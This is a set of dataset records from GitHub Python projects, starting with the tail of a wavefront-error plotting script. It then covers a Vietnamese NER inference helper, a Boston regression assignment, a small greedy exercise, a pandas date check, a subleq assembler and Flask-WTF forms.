phaseDiv.result['ajs']*1e9*lbda/2/np.pi\n \n a = np.where(rmsWFeTrue==rmsWFeTruePy[irms])\n \n rmsePy[irms] = fs.RMSE(ajsretrieved[irms,:],ajsTrue[a,:])\n rmsWFerrorsPyRetrieved[irms] = fs.RMSwavefrontError(jsretrieved[irms,:],ajsretrieved[irms,:])\n\n\n\nrmsWFerrorMax = 
np.max(np.append(rmsWFerrorsPyRetrieved,rmsWFeTrue))\nrmsWFerrorMin = np.min(np.append(rmsWFerrorsPyRetrieved,rmsWFeTrue))\n\nfnamerms = '../../../fig/PDDev/compDiversity/rmsWFerrorsretrieved_rmsWFeWthIDL%s'\nfnamermse = '../../../fig/PDDev/compDiversity/rmse_rmsWFeWthIDL%s'\nIxsortIDl = np.argsort(rmsWFeIDLtrue)\nIxsortPy = np.argsort(rmsWFeTruePy)\nfig = plt.figure()\nplt.hold(True)\nplt.plot(rmsWFeTruePy[IxsortPy],rmsWFerrorsPyRetrieved[IxsortPy],label='Analytical Algo')\nplt.plot(rmsWFeIDLtrue[IxsortIDl],rmsWFeIDLmodalretrieved[IxsortIDl],label='ONERA modal')\nplt.plot(rmsWFeIDLtrue[IxsortIDl],rmsWFeIDLzonalretrieved[IxsortIDl],label='ONERA zonal')\nplt.plot([rmsWFerrorMin,rmsWFerrorMax],[rmsWFerrorMin,rmsWFerrorMax],linewidth=2,c='grey')\nplt.xlim([rmsWFerrorMin,rmsWFerrorMax])\nplt.ylim([rmsWFerrorMin,rmsWFerrorMax])\nplt.xlabel('$\\sigma_{WF,rms}$ true [nm]')\nplt.ylabel('$\\sigma_{WF,rms}$ retrieved [nm]')\nplt.legend(loc='best')\nplt.grid()\nplt.savefig(fnamerms % ('.png'), dpi=300)\nplt.savefig(fnamerms % ('.pdf'), dpi=300)\n#plt.close(fig)\n\nfig = plt.figure()\nplt.plot(rmsWFeTruePy[IxsortPy],rmsePy[IxsortPy],label='Analytical Algo')\nplt.plot(rmsWFeIDLtrue[IxsortIDl],rmsemodal[IxsortIDl],label='ONERA modal')\nplt.plot(rmsWFeIDLtrue[IxsortIDl],rmsezonal[IxsortIDl],label='ONERA zonal')\nplt.xlim([rmsWFerrorMin,rmsWFerrorMax])\nplt.xlabel('$\\sigma_{WF,rms}$ true [nm]')\nplt.ylabel('RMSE [nm]')\nplt.legend(loc='best')\nplt.grid()\nplt.savefig(fnamermse % ('.png'), dpi=300)\nplt.savefig(fnamermse % ('.pdf'), dpi=300)\n#plt.close(fig)\n\n\nfor irms,rmsWFe in enumerate(rmsWFeTrue):\n filename = '../../../fig/PDDev/compDiversity/js_ajs_Python_IDL_rmsWfe_%d%s'\n a = np.where(rmsWFeTruePy==rmsWFe)\n plt.figure() \n plt.title('$\\sigma_{WF,rms}$ = %4.1f' % (rmsWFe))\n plt.hold(True)\n plt.plot(jsTrue[irms,:],ajsTrue[irms,:],linewidth = 3,label='True')\n plt.plot(jsretrieved[irms,:],ajsretrieved[irms,:],linewidth=2,label='Python retrieved')\n plt.plot(jsIDL[irms,:],ajsIDLmodal[irms,:],linewidth=2,label='IDL modal retrieved')\n plt.plot(jsIDL[irms,:],ajsIDLzonal[irms,:],linewidth=2,label='IDL zonal retrieved')\n plt.xlabel('j')\n plt.ylabel('aj [nm]')\n plt.xlim([jsTrue[irms,0],jsTrue[irms,-1]])\n plt.legend(loc='best')\n plt.grid()\n plt.savefig(filename % (rmsWFe,'.png'), dpi=300)\n plt.savefig(filename % (rmsWFe,'.pdf'), dpi=300)","repo_name":"jordanvoirin/PdM","sub_path":"Python/phaseDiversity/comparisonWthDiversity.py","file_name":"comparisonWthDiversity.py","file_ext":"py","file_size_in_byte":5842,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"7734609883","text":"import argparse\nimport sys\n\n# import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport torch\n# import transformersm\nfrom fairseq.data import Dictionary\nfrom fairseq.data.encoders.fastbpe import fastBPE\n# from keras.preprocessing.sequence import pad_sequences\nfrom keras_preprocessing.sequence import pad_sequences\nfrom sklearn.metrics import f1_score\nfrom sklearn.model_selection import train_test_split\nfrom torch import nn\nfrom torch.nn import CrossEntropyLoss\nfrom torch.utils.data import (DataLoader, RandomSampler, SequentialSampler,\n TensorDataset)\nfrom tqdm.notebook import trange\nfrom transformers import *\nfrom transformers import (AdamW, RobertaConfig, RobertaForTokenClassification,\n get_linear_schedule_with_warmup)\n\n\nclass Ner(BertPreTrainedModel):\n config_class = RobertaConfig\n pretrained_model_archive_map = ROBERTA_PRETRAINED_MODEL_ARCHIVE_MAP\n base_model_prefix = \"roberta\"\n\n def __init__(self, config):\n super().__init__(config)\n self.num_labels = config.num_labels\n self.roberta = RobertaModel(config)\n self.dropout = nn.Dropout(config.hidden_dropout_prob)\n self.classifier = nn.Linear(\n config.hidden_size*4, config.num_labels)\n self.init_weights()\n\n def forward(\n self,\n input_ids=None,\n attention_mask=None,\n token_type_ids=None,\n position_ids=None,\n head_mask=None,\n inputs_embeds=None,\n labels=None,\n ):\n\n outputs = self.roberta(\n input_ids,\n attention_mask=attention_mask,\n token_type_ids=token_type_ids,\n position_ids=position_ids,\n head_mask=head_mask,\n inputs_embeds=inputs_embeds,\n )\n\n output = torch.cat(\n (outputs[2][-1], outputs[2][-2], outputs[2][-3], outputs[2][-4]), dim=-1)\n sequence_output = self.dropout(output)\n logits = self.classifier(sequence_output)\n outputs = logits\n\n if labels is not None:\n loss_fct = CrossEntropyLoss()\n active_loss = attention_mask.view(-1) == 1\n active_logits = logits.view(-1, self.num_labels)\n active_labels = torch.where(\n active_loss, labels.view(-1), torch.tensor(\n loss_fct.ignore_index).type_as(labels)\n )\n loss = loss_fct(active_logits, active_labels)\n outputs = (loss, logits)\n return outputs\n\n\nmodel2 = torch.load(\"model/best_ner_syllable.pt\", map_location='cpu')\n\ndf_test = []\ni = 1\nfor line in open(\"data/test_word.conll\", \"r\").readlines():\n if len(line.split()) < 2:\n i += 1\n else:\n tmp = line.split()\n tmp.append('s'+str(i))\n df_test.append(tmp)\n\ndata_test = pd.DataFrame(df_test, columns=['Word', 'Tag', 'Sentence#'])\n\n\ndef concatWord(data):\n def tuple_func(f): return [(w, t)\n for w, t in zip(f['Word'].values, f['Tag'].values)]\n sentences_with_tag = data.groupby('Sentence#').apply(tuple_func)\n # print(sentences_with_tag)\n sentences_with_tag = [sent for sent in sentences_with_tag]\n return sentences_with_tag\n\n\nsentences_with_tag_test = concatWord(data_test)\n\nsentences_test = [' '.join([word[0] for word in sent])\n for sent in sentences_with_tag_test]\nlabels_test = [[word[1] for word in sent] for sent in sentences_with_tag_test]\n\n\ndf_train = []\ni = 1\nfor line in open(\"data/train_syllable.conll\", \"r\").readlines():\n if len(line.split()) < 2:\n i += 1\n else:\n tmp = line.split()\n tmp.append('s'+str(i))\n df_train.append(tmp)\ndata_train = pd.DataFrame(df_train, columns=['Word', 'Tag', 'Sentence#'])\nlabel2idx = {k: v for v, k in enumerate(data_train.Tag.unique())}\nids_to_labels = {v: k for v, k in enumerate(data_train.Tag.unique())}\nlabel2idx['PAD'] = 20\nlabel2idx['[CLS]'] = 
21\nlabel2idx['[SEP]'] = 22\nlabel2idx['X'] = 23\nids_to_labels[20] = 'PAD'\nids_to_labels[21] = '[CLS]'\nids_to_labels[22] = '[SEP]'\nids_to_labels[23] = 'X'\n\nlabels_value = ['PAD', '[CLS]', '[SEP]', 'X']+data_train.Tag.unique().tolist()\nparser = argparse.ArgumentParser()\nparser.add_argument('--bpe-codes',\n default=\"phobert-base/bpe.codes\",\n required=False,\n type=str,\n help='path to fastBPE BPE'\n )\nargs, unknown = parser.parse_known_args()\n\nbpe = fastBPE(args)\nvocab = Dictionary()\nvocab.add_from_file(\"phobert-base/vocab.txt\")\n\n\ndef text2output(text, vocab):\n sentences_test\n subwords_test = [' '+bpe.encode(text)+' ']\n input_ids_test = pad_sequences([vocab.encode_line(sent, append_eos=False, add_if_not_exist=False).long().tolist() for sent in subwords_test],\n truncating='post', padding='post', maxlen=90, value=1.0, dtype='long')\n attenion_mask_test = [[float(val != 1) for val in sent]\n for sent in input_ids_test]\n\n X_test = input_ids_test\n test_mask = attenion_mask_test\n\n X_test = torch.tensor(X_test)\n test_mask = torch.tensor(test_mask)\n pred_labels_ids = []\n with torch.no_grad():\n output_test = model2(X_test[0:1], test_mask[0:1])\n\n logit = output_test.detach().cpu().numpy()\n pred_labels_ids.extend([list(pred_label)\n for pred_label in np.argmax(logit, axis=2)])\n pred = [ids_to_labels[pred_labels_ids[j][i]] for j in range(\n len(pred_labels_ids)) for i in range(len(pred_labels_ids[j]))]\n return list(zip(subwords_test[0].split(), pred))\n # return subwords_test[0].split(), pred\n\nbang_nguyen_am = [['a', 'à', 'á', 'ả', 'ã', 'ạ', 'a'],\n ['ă', 'ằ', 'ắ', 'ẳ', 'ẵ', 'ặ', 'aw'],\n ['â', 'ầ', 'ấ', 'ẩ', 'ẫ', 'ậ', 'aa'],\n ['e', 'è', 'é', 'ẻ', 'ẽ', 'ẹ', 'e'],\n ['ê', 'ề', 'ế', 'ể', 'ễ', 'ệ', 'ee'],\n ['i', 'ì', 'í', 'ỉ', 'ĩ', 'ị', 'i'],\n ['o', 'ò', 'ó', 'ỏ', 'õ', 'ọ', 'o'],\n ['ô', 'ồ', 'ố', 'ổ', 'ỗ', 'ộ', 'oo'],\n ['ơ', 'ờ', 'ớ', 'ở', 'ỡ', 'ợ', 'ow'],\n ['u', 'ù', 'ú', 'ủ', 'ũ', 'ụ', 'u'],\n ['ư', 'ừ', 'ứ', 'ử', 'ữ', 'ự', 'uw'],\n ['y', 'ỳ', 'ý', 'ỷ', 'ỹ', 'ỵ', 'y']]\nbang_ky_tu_dau = ['', 'f', 's', 'r', 'x', 'j']\n\nnguyen_am_to_ids = {}\n\nfor i in range(len(bang_nguyen_am)):\n for j in range(len(bang_nguyen_am[i]) - 1):\n nguyen_am_to_ids[bang_nguyen_am[i][j]] = (i, j)\n\n\ndef chuan_hoa_dau_tu_tieng_viet(word):\n if not is_valid_vietnam_word(word):\n return word\n\n chars = list(word)\n dau_cau = 0\n nguyen_am_index = []\n qu_or_gi = False\n for index, char in enumerate(chars):\n x, y = nguyen_am_to_ids.get(char, (-1, -1))\n if x == -1:\n continue\n elif x == 9: # check qu\n if index != 0 and chars[index - 1] == 'q':\n chars[index] = 'u'\n qu_or_gi = True\n elif x == 5: # check gi\n if index != 0 and chars[index - 1] == 'g':\n chars[index] = 'i'\n qu_or_gi = True\n if y != 0:\n dau_cau = y\n chars[index] = bang_nguyen_am[x][0]\n if not qu_or_gi or index != 1:\n nguyen_am_index.append(index)\n if len(nguyen_am_index) < 2:\n if qu_or_gi:\n if len(chars) == 2:\n x, y = nguyen_am_to_ids.get(chars[1])\n chars[1] = bang_nguyen_am[x][dau_cau]\n else:\n x, y = nguyen_am_to_ids.get(chars[2], (-1, -1))\n if x != -1:\n chars[2] = bang_nguyen_am[x][dau_cau]\n else:\n chars[1] = bang_nguyen_am[5][dau_cau] if chars[1] == 'i' else bang_nguyen_am[9][dau_cau]\n return ''.join(chars)\n return word\n\n for index in nguyen_am_index:\n x, y = nguyen_am_to_ids[chars[index]]\n if x == 4 or x == 8: # ê, ơ\n chars[index] = bang_nguyen_am[x][dau_cau]\n # for index2 in nguyen_am_index:\n # if index2 != index:\n # x, y = nguyen_am_to_ids[chars[index]]\n # chars[index2] = 
bang_nguyen_am[x][0]\n return ''.join(chars)\n\n if len(nguyen_am_index) == 2:\n if nguyen_am_index[-1] == len(chars) - 1:\n x, y = nguyen_am_to_ids[chars[nguyen_am_index[0]]]\n chars[nguyen_am_index[0]] = bang_nguyen_am[x][dau_cau]\n # x, y = nguyen_am_to_ids[chars[nguyen_am_index[1]]]\n # chars[nguyen_am_index[1]] = bang_nguyen_am[x][0]\n else:\n # x, y = nguyen_am_to_ids[chars[nguyen_am_index[0]]]\n # chars[nguyen_am_index[0]] = bang_nguyen_am[x][0]\n x, y = nguyen_am_to_ids[chars[nguyen_am_index[1]]]\n chars[nguyen_am_index[1]] = bang_nguyen_am[x][dau_cau]\n else:\n # x, y = nguyen_am_to_ids[chars[nguyen_am_index[0]]]\n # chars[nguyen_am_index[0]] = bang_nguyen_am[x][0]\n x, y = nguyen_am_to_ids[chars[nguyen_am_index[1]]]\n chars[nguyen_am_index[1]] = bang_nguyen_am[x][dau_cau]\n # x, y = nguyen_am_to_ids[chars[nguyen_am_index[2]]]\n # chars[nguyen_am_index[2]] = bang_nguyen_am[x][0]\n return ''.join(chars)\n\n\ndef is_valid_vietnam_word(word):\n chars = list(word)\n nguyen_am_index = -1\n for index, char in enumerate(chars):\n x, y = nguyen_am_to_ids.get(char, (-1, -1))\n if x != -1:\n if nguyen_am_index == -1:\n nguyen_am_index = index\n else:\n if index - nguyen_am_index != 1:\n return False\n nguyen_am_index = index\n return True\n\n\nimport regex as re # the \p{...} Unicode property classes below need the third-party 'regex' module; the stdlib 're' (never imported in this file) does not support them\n\n\ndef chuan_hoa_dau_cau_tieng_viet(sentence):\n \"\"\"\n Normalize a Vietnamese sentence to the old-style tone mark convention.\n :param sentence:\n :return:\n \"\"\"\n sentence = sentence.lower()\n words = sentence.split()\n for index, word in enumerate(words):\n cw = re.sub(r'(^\p{P}*)([\p{L}.]*\p{L}+)(\p{P}*$)',\n r'\1/\2/\3', word).split('/')\n # print(cw)\n if len(cw) == 3:\n cw[1] = chuan_hoa_dau_tu_tieng_viet(cw[1])\n words[index] = ''.join(cw)\n return ' '.join(words)\n\n\ndef chuan_hoa_chuam_cau(text):\n # split a trailing punctuation mark off each token so it stands alone\n tmp = []\n for t in text.split():\n if t[-1] in ',.:!?;*#$%^*()!~':\n t = t[:-1]+' '+t[-1]\n tmp.append(t)\n return ' '.join(tmp)\n\nimport unicodedata\n# normalize the whole sentence; the word-level chuan_hoa_dau_tu_tieng_viet is a no-op on multi-word input\ntext = chuan_hoa_dau_cau_tieng_viet(sys.argv[1])\ntext = chuan_hoa_chuam_cau(text)\ntext = unicodedata.normalize('NFC', text)\nfinal_result = text2output(text, vocab)\n# print(sys.argv[1])\n# print(text)\n# print(final_result)\nwith open(\"data/first_text.txt\", \"w\") as f:\n f.write(sys.argv[1])\nwith open(\"data/final_result.txt\", \"w\") as f:\n f.write(' '.join([str(item) for item in final_result]))\n\n","repo_name":"AndrewBui-AI-CS/NLP_CovidNer","sub_path":"api/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":11022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
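The Ner model in the record above builds its token-classification features by concatenating the last four hidden layers, and it indexes outputs[2], which a transformers RobertaModel only exposes when the checkpoint's config has output_hidden_states=True. A minimal sketch of that concatenation, with random tensors standing in for the real hidden states so it runs without any model weights:

import torch

# Stand-ins for outputs[2]: embedding layer + 12 transformer layers,
# each of shape (batch, seq_len, hidden_size).
hidden_states = [torch.randn(2, 16, 768) for _ in range(13)]

# Concatenate the last four layers along the feature axis, as in Ner.forward.
features = torch.cat(
    (hidden_states[-1], hidden_states[-2], hidden_states[-3], hidden_states[-4]),
    dim=-1,
)
assert features.shape == (2, 16, 768 * 4)  # matches the classifier's hidden_size*4 input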
+{"seq_id":"26376759162","text":"\"\"\"\r\n\"Assignment 4 - SK Learn Introduction\" - Part 1\r\nBoston Dataset\r\n\"\"\"\r\n\r\n\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn.datasets import load_boston\r\nimport pandas as pd\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ndef plot_graph(boston_get_data, feature_name, target_name):\r\n\r\n boston_plot_data_df = pd.DataFrame(\r\n boston_get_data.data, columns=boston_get_data.feature_names\r\n )\r\n boston_plot_data_df[target_name] = boston_get_data.target\r\n sns.pairplot(\r\n boston_plot_data_df,\r\n x_vars=[feature_name],\r\n y_vars=target_name,\r\n height=7,\r\n aspect=0.7,\r\n kind=\"reg\",\r\n )\r\n plt.title(\"Slope of the factor with the largest effect\")\r\n plt.show()\r\n\r\n\r\ndef make_regression_boston_data_and_plot():\r\n\r\n boston_get_data = load_boston()\r\n x_boston_dataframe = pd.DataFrame(\r\n boston_get_data.data, columns=boston_get_data.feature_names\r\n )\r\n y_boston_dataframe = pd.DataFrame(boston_get_data.target, columns=[\"MEDV\"])\r\n linear_regr = LinearRegression()\r\n linear_regr.fit(x_boston_dataframe, y_boston_dataframe)\r\n coeff_df = pd.DataFrame(\r\n linear_regr.coef_.T, x_boston_dataframe.columns, columns=[\"Coefficient\"]\r\n )\r\n print(coeff_df)\r\n max_coeff_index = coeff_df.abs()[\"Coefficient\"].idxmax()\r\n max_abs_coeff_value = coeff_df.abs().loc[max_coeff_index, \"Coefficient\"]\r\n print(\r\n \"The factor which has the largest effect on the price of housing in Boston is:\"\r\n + max_coeff_index\r\n )\r\n print(\r\n \"The absolute value of the coefficient of the factor which has the largest effect is: {}\".format(\r\n max_abs_coeff_value\r\n )\r\n )\r\n plot_graph(boston_get_data, max_coeff_index, \"MEDV\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n make_regression_boston_data_and_plot()\r\n\r\n\r\n\"\"\"\r\n\r\nComment\r\n\r\nIn order to solve the first part of \"Assignment 4 - SK Learn\r\nIntroduction\" (the part regarding the Boston dataset) first I\r\nimport \"LinearRegression\" from \"sklearn.linear_model\", \"load_boston\"\r\nfrom \"sklearn.datasets\", \"pandas\" as \"pd\", \"seaborn\" as \"sns\" and\r\n\"matplotlib.pyplot\" as \"plt\".\r\nThen I define the first function, named \"plot_graph\", and I include\r\nin the brackets \"boston_get_data\", \"feature_name\" and \"target_name\".\r\nMoreover, I set \"boston_plot_data_df\" equal to \"pd.DataFrame()\" and I\r\nalso include in the brackets \"boston_get_data.data\" and I set\r\n\"columns\" equal to \"boston_get_data.feature_names\". In addition to\r\nthis, I also set \"boston_plot_data_df[target_name]\" equal to\r\n\"boston_get_data.target\".\r\nFurthermore, I also include \"sns.pairplot\" and inside the brackets\r\nI include \"boston_plot_data_df\", \"x_vars=[feature_name]\",\r\n\"y_vars=target_name\" and I also set \"height\" equal to \"7\", \"aspect\"\r\nequal to \"0.7\" and \"kind\" equal to \"reg\".\r\nMoreover, I also include \"plt.title()\" and inside the brackets I also\r\ninclude the title of the plot, which is \"Slope of the factor with the\r\nlargest effect\". Lastly, I also include \"plt.show()\".\r\nFurthermore, I also define \"make_regression_boston_data_and_plot()\". To\r\nthis regard, first I set \"boston_get_data\" equal to \"load_boston()\" in\r\norder to take into consideration the data of the Boston dataset. 
Moreover, the function builds the feature DataFrame \"x_boston_dataframe\" and the\r\ntarget DataFrame \"y_boston_dataframe\" (with the single column \"MEDV\"), fits a\r\n\"LinearRegression\" on them and collects the fitted coefficients in \"coeff_df\",\r\nwhich is then printed.\r\nCalling \"coeff_df.abs()[\"Coefficient\"].idxmax()\" identifies the factor with the\r\nlargest absolute coefficient; its name and absolute value are printed before\r\n\"plot_graph()\" is called for that feature against \"MEDV\".\r\nFinally, \"make_regression_boston_data_and_plot()\" is run from the\r\n\"if __name__ == \"__main__\":\" guard, and the whole file was formatted by running\r\n\"black\" on it from the terminal.\r\n\r\n\r\nFrom the results obtained by running this code it is possible to state\r\nthat the factor that has the largest effect on the price of housing in\r\nBoston is \"NOX\" and also that the absolute value of its coefficient is\r\n17.766611228299986.\r\n\r\n\"\"\"\r\n","repo_name":"federico-mecchia/Assignment.4.SK.Learn.Introduction","sub_path":"Assignment.4.SK.Learn.Introduction.Part.1.py","file_name":"Assignment.4.SK.Learn.Introduction.Part.1.py","file_ext":"py","file_size_in_byte":5273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
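Note that load_boston was deprecated in scikit-learn 1.0 and removed in 1.2, so the record above only runs on older versions. The coefficient-selection step itself is independent of the dataset; a small self-contained sketch with illustrative values:

import pandas as pd

# Toy coefficient table in the same shape the script builds.
coeff_df = pd.DataFrame({"Coefficient": [-0.11, -17.77, 3.85]},
                        index=["CRIM", "NOX", "RM"])

max_coeff_index = coeff_df.abs()["Coefficient"].idxmax()
max_abs_coeff_value = coeff_df.abs().loc[max_coeff_index, "Coefficient"]
print(max_coeff_index, max_abs_coeff_value)  # NOX 17.77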
+{"seq_id":"17381423377","text":"def sol(arr):\r\n #negative no store karo\r\n neg=0\r\n largneg=-99999999999999\r\n flag=0\r\n for i in arr:\r\n if i <0:\r\n largneg=max(largneg,i)\r\n neg+=1\r\n if i==0:\r\n flag=1\r\n # print(largneg)\r\n if (neg)==0:\r\n return min(arr)\r\n\r\n if (neg)%2==0 and largneg!=-99999999999999:\r\n arr.remove(largneg)\r\n res=1\r\n for i in arr:\r\n if i ==0:\r\n continue\r\n res*=i\r\n return res\r\n\r\nif __name__ == '__main__':\r\n arr=[ 2,5,-1,-2,-3,-4]\r\n # arr=[1,2,3,4,5,6,0]\r\n print(sol(arr))\r\n","repo_name":"Samundar9525/data_structure_using_Python","sub_path":"greedy/minimum product subaray.py","file_name":"minimum product subaray.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"17934463164","text":"import pandas as pd\r\nfrom datetime import datetime\r\n\r\ndf = pd.read_csv('python hands-on - dataset.csv')\r\nprint(df)\r\n\r\ndef isObsolete(benchmark_date,date):\r\n #date format must be 'yyyy-mm-dd'\r\n try:\r\n bm_date = datetime.strptime(benchmark_date,'%Y-%m-%d')\r\n date_to_check = datetime.strptime(date,'%Y-%m-%d')\r\n if date_to_check < bm_date:\r\n return 'TRUE'\r\n else:\r\n return 'FALSE'\r\n except TypeError as TE:\r\n print('Date must be a string in the format \"yyyy-mm-dd\"')\r\n except Exception as e:\r\n print('Some Other Error Occured: '+str(e)) \r\n\r\n \r\nbenchmark_date = '2021-01-01'\r\n\r\ndf['obsolete'] = df['date'].apply(lambda x: isObsolete(benchmark_date,x))\r\nprint(df)\r\n\r\nexportname = 'python hands-on - dataset.json'\r\ntry:\r\n df.to_json(exportname,orient='columns')\r\n print('File saved to current directory as '+ exportname)\r\nexcept Exception as e:\r\n print('Error saving json file: '+str(e))","repo_name":"jo5hxxvii/Data2BotsPythonHandsOnTest","sub_path":"Data2Bots Python Hands on Test.py","file_name":"Data2Bots Python Hands on Test.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"70492683422","text":"from functools import reduce\nfrom .util import *\n\nclass Subleq:\n NEXT = object()\n AGAIN = object()\n\n @staticmethod\n def to_string(a):\n if a == Subleq.NEXT:\n return \"NEXT\"\n elif a == Subleq.AGAIN:\n return \"AGAIN\"\n elif a == None:\n return \"NONE\"\n else:\n return a\n\nclass Program:\n def __init__(self):\n self.memory = []\n self.labels = dict()\n self.idx = None\n\n def index(self):\n return self.idx or len(self.memory)\n\n def seek(self, index):\n self.idx = index\n\n def set(self, data, line):\n if self.idx == len(self.memory):\n self.idx = None\n\n if self.idx != None:\n if self.idx < len(self.memory):\n if self.memory[self.idx] == None:\n self.memory[self.idx] = data\n self.idx += 1\n else:\n Error(\"trying to overwrite already written address 0x{:04x} in line {}\".format(self.idx, self.line))\n elif data != None:\n while self.idx >= len(self.memory):\n self.memory.append(None)\n self.memory[self.idx] = data\n self.idx += 1\n\n else:\n self.memory.append(data)\n\nclass Token:\n def is_seek(self, token):\n return token[0] == \"@\"\n\n def is_label(self, token):\n return token[-1] == \":\"\n\n def is_number(self, token):\n return token[0] in \"-0123456789\" or token == \"NONE\"\n\n def is_symbol(self, token):\n return not (self.is_seek(token) or self.is_label(token) or self.is_number(token))\n\nclass Assembler:\n def __init__(self, token = None, program = None, **kwargs):\n if program == None:\n program = Program()\n if token == None:\n token = Token()\n\n self.program = program\n self.token = token\n\n def next_token(self):\n return self.tokens.pop(0)\n\n def parse_seek(self, line, token):\n token = token[1:]\n try:\n token = parse_int(token)\n except:\n Error(\"could not parse {} as integer in line {}\".format(token, line))\n self.program.seek(token)\n\n def parse_label(self, line, token):\n token = token[:-1]\n if not self.token.is_symbol(token) or token == \"NEXT\" or token == \"AGAIN\":\n Error(\"definition of reserved label {} in line {}\".format(token, line))\n if token in self.program.labels:\n Error(\"redefinition of label {} in line {}\".format(token, line))\n self.program.labels[token] = self.program.index()\n\n def parse_number(self, line, token):\n if token == \"NONE\":\n token = None\n else:\n try:\n token = parse_int(token)\n except:\n Error(\"could not parse {} as integer in line {}\".format(token, line))\n\n self.program.set(token, line)\n\n def parse_symbol(self, line, token):\n if token == \"NEXT\":\n token = Subleq.NEXT\n elif token == \"AGAIN\":\n token = Subleq.AGAIN\n self.program.set(token, line)\n\n def parse_token(self, line, token):\n if self.token.is_seek(token):\n self.parse_seek(line, token)\n elif self.token.is_label(token):\n self.parse_label(line, token)\n elif self.token.is_number(token):\n self.parse_number(line, token)\n else:\n self.parse_symbol(line, token)\n\n def parse_finish(self):\n pass\n\n def write_start(self):\n pass\n\n def write_word(self, word):\n pass\n\n def write_finish(self):\n pass\n\n def write_output(self):\n self.write_start()\n\n for i, word in enumerate(self.program.memory):\n if word == None:\n word = 0\n elif type(word) == str:\n try:\n word = self.program.labels[word]\n except:\n Error(\"undefined label {} at address 0x{:04x}\".format(word, i))\n elif word == Subleq.NEXT:\n word = i + 1\n elif word == Subleq.AGAIN:\n word = i - 2\n word = neg2twos(word)\n\n self.write_word(word)\n\n self.write_finish()\n\n def assemble(self):\n data = self.read_input()\n\n lines = 
enumerate(data.split('\\n'), 1)\n tokenlists = map(lambda e: list(map(lambda tok: (e[0], tok), e[1].split())), lines)\n\n self.tokens = reduce(lambda a, b: a + b, tokenlists, [])\n\n while len(self.tokens) != 0:\n line, token = self.next_token()\n self.parse_token(line, token)\n\n self.parse_finish()\n self.write_output()\n","repo_name":"Ferdi265/hl-subleq-tools","sub_path":"hlsubleq/asm.py","file_name":"asm.py","file_ext":"py","file_size_in_byte":4707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
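The assembler above only emits a memory image (note that Program.set's error message references self.line, which is never assigned; the value it reports comes in through the method's line parameter). To see what the emitted words mean, here is a textbook single-instruction subleq interpreter, independent of this repo's conventions such as the neg2twos encoding:

def run_subleq(mem, pc=0):
    # subleq a b c: mem[b] -= mem[a]; branch to c when the result is <= 0.
    # Convention here: branching to a negative address halts the machine.
    while 0 <= pc <= len(mem) - 3:
        a, b, c = mem[pc], mem[pc + 1], mem[pc + 2]
        mem[b] -= mem[a]
        pc = c if mem[b] <= 0 else pc + 3
    return mem

print(run_subleq([3, 3, -1, 7]))  # clears cell 3 (7 - 7 = 0), then halts -> [3, 3, -1, 0]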
+{"seq_id":"26450639962","text":"from flask_wtf import FlaskForm\nfrom wtforms import StringField, SubmitField, PasswordField, BooleanField\nfrom wtforms.validators import Required, Length, Email, EqualTo, ValidationError\nfrom application.models import Users, Posts\nfrom flask_login import current_user\n\ndef Unique_title(): #attempt to colaspe to singel unique function message = 'value must be unique'\n def _Unique_title(form, feild):\n if str(Posts.query.filter_by(title = feild.data).all()) != '[]':\n raise ValidationError(\"Value entered not unique.\")\n print('failed validation test for uniqueness')\n return _Unique_title\n\n\ndef Unique_content():\n message = 'value must be unique'\n def _Unique_content(form, feild):\n if str(Posts.query.filter_by(content = feild.data).all()) != '[]':\n raise ValidationError(\"Value entered not unique.\")\n print('failed validation test for uniqueness')\n return _Unique_content\n\n\n\n\n\n\n\n\n\nclass PostForm(FlaskForm):\n title = StringField('Title',\n validators = [\n Required(),\n Unique_title(),\n Length(min=2, max=100)\n ]\n )\n content = StringField('Content',\n validators = [\n Required(),\n Unique_content(),\n Length(min=2, max=1000)\n ]\n )\n submit = SubmitField('Post!') \n\nclass RegistrationForm(FlaskForm):\n\n first_name = StringField('First Name',\n validators = [\n Required(),\n Length(min=2, max=30)\n ]\n )\n last_name = StringField('last Name',\n validators = [\n Required(),\n Length(min=2, max=30)\n ]\n )\n\n email = StringField('Email',\n validators = [\n Required(),\n Email()\n ]\n )\n password = PasswordField('Password',\n validators = [\n Required(),\n ]\n )\n confirm_password = PasswordField('Confirm Password',\n validators = [\n Required(),\n EqualTo('password')\n ]\n )\n submit = SubmitField('Sign Up')\n\n def validate_email(self, email):\n user = Users.query.filter_by(email=email.data).first()\n\n if user:\n raise ValidationError('Email already in use')\n\nclass LoginForm(FlaskForm):\n email = StringField('Email',\n validators=[\n Required(),\n Email()\n ]\n )\n\n password = PasswordField('Password',\n validators=[\n Required()\n ]\n )\n\n remember = BooleanField('Remember Me')\n submit = SubmitField('Login')\n\nclass UpdateAccountForm(FlaskForm):\n first_name = StringField('First Name',\n validators=[\n Required(),\n Length(min=4, max=30)\n ])\n last_name = StringField('Last Name',\n validators=[\n Required(),\n Length(min=4, max=30)\n ])\n email = StringField('Email',\n validators=[\n Required(),\n Email()\n ])\n submit = SubmitField('Update')\n\n def validate_email(self,email):\n if email.data != current_user.email:\n user = Users.query.filter_by(email=email.data).first()\n if user:\n raise ValidationError('Email already in use')\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"MattCrutchley/flask-app","sub_path":"application/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
